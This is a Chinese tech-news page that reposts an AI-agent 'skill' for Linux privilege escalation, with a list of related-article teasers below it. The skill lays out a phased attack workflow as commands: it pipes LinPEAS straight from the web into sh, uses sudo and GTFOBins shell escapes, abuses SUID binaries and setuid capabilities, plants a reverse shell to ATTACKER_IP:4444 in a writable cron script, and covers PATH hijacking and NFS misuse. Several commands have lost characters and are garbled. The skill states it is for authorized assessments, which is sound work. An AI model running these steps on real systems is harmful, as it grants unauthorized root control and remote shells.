新闻详情

新闻详情

首页 / 资讯中心 / 详情

【计算机工具类-操作系统Skills】linux-privilege-escalation 技能

发布时间:2026/9/10 23:00:03来源:尧图网络
【计算机工具类-操作系统Skills】linux-privilege-escalation 技能
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control.技能概述linux-privilege-escalation 技能在Linux系统上执行系统化权限提升评估识别和利用错误配置、易受攻击的服务和安全弱点从而实现从低权限用户访问到root级别控制的提升。下载地址https://github.com/sickn33/antigravity-awesome-skills/tree/main/skills/linux-privilege-escalation授权使用声明:此技能仅用于授权的安全评估、防御性验证或受控的教育环境。输入/前置条件目标Linux系统的低权限shell访问执行命令的能力交互式或半交互式shell反向shell连接的网络访问如需要攻击者机器用于托管payload和接收shell输出/交付物目标系统上的root shell访问权限提升路径文档系统枚举发现报告修复建议核心工作流程阶段1: 系统枚举# 主机名和系统角色hostname# 内核版本和架构uname -a# 详细内核信息cat /proc/version# 操作系统详情cat /etc/issuecat /etc/*-release阶段2: 自动化枚举# LinPEAScurl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh# LinEnum./LinEnum.sh -t# Linux Smart Enumeration./lse.sh -l 1# Linux Exploit Suggester./les.sh阶段3: 内核漏洞利用识别内核版本并搜索漏洞uname -rcat /proc/version# 使用Linux Exploit Suggester./linux-exploit-suggester.sh# 手动搜索searchsploit linux kernel [version]阶段4: Sudo利用# 枚举sudo权限sudo -l# GTFOBins sudo利用示例sudo vim -c :!/bin/bashsudo find . -exec /bin/sh \; -quitsudo awk BEGIN {system(/bin/bash)}阶段5: SUID二进制文件利用# 查找SUID二进制文件find / -type f -perm -04000 -ls 2/dev/nullfind / -perm -us -type f 2/dev/null# 利用SUID二进制文件参考GTFOBins阶段6: Capabilities利用# 枚举capabilitiesgetcap -r / 2/dev/null# 利用示例/usr/bin/python3 -c import os; os.setuid(0); os.system(/bin/bash)阶段7: Cron作业利用# 枚举cron作业cat /etc/crontabls -la /var/spool/cron/crontabs/ls -la /etc/cron.*# 利用可写cron脚本echo bash -i /dev/tcp/ATTACKER_IP/4444 01 /opt/backup.sh阶段8: PATH劫持# 查找调用外部命令的SUID二进制文件strings /usr/local/bin/suid-binary# 通过在可写PATH中创建恶意二进制文件进行劫持export PATH/tmp:$PATHecho -e #!/bin/bash\n/bin/bash -p /tmp/servicechmod x /tmp/service阶段9: NFS利用# 查找no_root_squash选项cat /etc/exports# 挂载共享并创建SUID二进制文件showmount -e TARGET_IPmount -o rw TARGET_IP:/share /tmp/nfs快速参考内核版本:uname -a当前用户:idSudo权限:sudo -lSUID文件:find / -perm -us -type f 2/dev/nullCapabilities:getcap -r / 2/dev/nullCron作业:cat /etc/crontab可写目录:find / -writable -type d 2/dev/nullNFS导出:cat /etc/exports关键资源GTFOBins: GTFOBinsLinPEAS: https://github.com/carlospolop/PEASS-ngLinux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester约束和限制在生产环境使用前在测试环境中验证内核漏洞失败的内核漏洞可能导致系统崩溃记录权限提升期间的所有更改仅在授权时维护访问持久性局限性仅在任务明确匹配上述范围时使用此技能不要将输出视为环境特定验证、测试或专家审查的替代品如果缺少必需的输入、权限、安全边界或成功标准请停止并请求澄清
网站建设高端定制企业官网
RELATED

相关资讯

更多精彩内容,欢迎继续阅读

较早相关资讯

最新相关资讯

gRPC Handshaker 框架深入解析:可插拔的连接协商与安全握手架构 2026/9/11 17:09:22

gRPC Handshaker 框架深入解析:可插拔的连接协商与安全握手架构

gRPC Handshaker 框架深入解析:可插拔的连接协商与安全握手架构 【免费下载链接】grpc C based gRPC (C, Python, Ruby, Objective-C, PHP, C#) 项目地址: https://gitcode.com/GitHub_Trending/gr/grpc gRPC 的 src/core/handshaker/ 目录承载了核心的 Hand…

阅读更多 →
1.设置为固定IP,防止搬工位IP变化 2.禁止windows更新 2026/9/11 17:09:22

1.设置为固定IP,防止搬工位IP变化 2.禁止windows更新

1)固定IP2)禁止windows更新关闭 Windows Update 服务点击停止

阅读更多 →
收集SNMP数据到OpenTelemetry 2026/9/11 17:09:22

收集SNMP数据到OpenTelemetry

1. 概述 我记得老年间SNMP是非常流行的监控协议,因为它的设计真的很用心很精细。那时候懂SNMP的人都自我感觉很好的,每个人都 显出似乎很懂技术的样子☺。后来到了移动互联网的时代,这个协议就不那么吃香了,因为它只是个适合局域…

阅读更多 →
结构化提示词提升AI写作效率与爆款率 2026/9/11 17:09:22

结构化提示词提升AI写作效率与爆款率

1. 为什么新手博主需要结构化提示词刚入行的内容创作者常面临三大痛点:创作效率低、内容质量不稳定、平台算法难把握。我见过太多新手博主每天花5-6小时憋一篇千字文,发布后阅读量却不过百。结构化提示词正是解决这些痛点的利器——它就像烹饪时的标准化…

阅读更多 →
从坐标系到QGIS:北京shp数据包标准化处理全流程 2026/9/11 17:09:22

从坐标系到QGIS:北京shp数据包标准化处理全流程

简介:这份10类数据包面向GIS、城市规划、资源管理等从业者,汇聚2024年北京市最新版行政边界与人文地理要素,提供省、市、县区、乡镇街道四级区划,以及水系、道路、大学、景点、高程、土壤类型等完整图层,可直接支撑空间…

阅读更多 →
Spring Boot房屋租赁系统毕设实战:数据建模、核心接口与答辩要点 2026/9/11 17:06:21

Spring Boot房屋租赁系统毕设实战:数据建模、核心接口与答辩要点

简介:这是一份基于Spring Boot的房屋租赁系统毕业设计资料包,面向计算机相关专业毕业生或需要完成类似课题的开发者。系统采用Java与MySQL开发,后端基于Spring Boot框架,整合Mybatis、Ajax、Vue等技术,整体采用B/S架构…

阅读更多 →

今日资讯

本周资讯

本月资讯

看完文章仍有疑问?

联系尧图顾问,获取一对一建站咨询

立即免费咨询 📞 400-888-8888
📞